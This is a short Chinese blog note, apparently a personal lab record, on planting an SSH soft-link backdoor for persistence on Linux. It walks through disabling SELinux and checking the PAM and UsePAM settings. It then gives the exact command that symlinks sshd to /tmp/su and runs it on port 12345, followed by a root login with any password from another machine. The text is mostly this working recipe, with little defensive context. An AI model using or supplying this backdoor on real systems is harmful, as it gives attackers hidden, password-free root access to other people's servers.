通过SSH留后门(创建ssh软链接)

本文介绍了如何修改SELINUX配置,检查sshd_config中UsePAM参数,以及确认PAM配置文件是否存在安全隐患。接着,展示了创建SSH后门软链接的过程,并监听特定端口。最后,说明了如何通过另一台机器尝试使用该后门进行任意密码登录。这是一个关于系统安全和SSH漏洞利用的实践案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、修改/etc/selinux/config文件中的SELINUX="" 为 disabled 。

二、判断sshd_config配置中的UsePAM参数是否为yes

cat /etc/ssh/sshd_config

三、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。

四、通过命令创建后门软链接,通过查看端口己监听。

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345

netstat -antlp

五、通过另一台机器ssh进行任意密码登录。

ssh root@192.168.137.130 -p 12345 

本次实验通过学习安全小白团的文章而成功,本次只做一次简单笔记以便日后翻查。

原始链接如下: 

 ​​​​​​​权限维持 | SSH软链接后门 - 简书

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值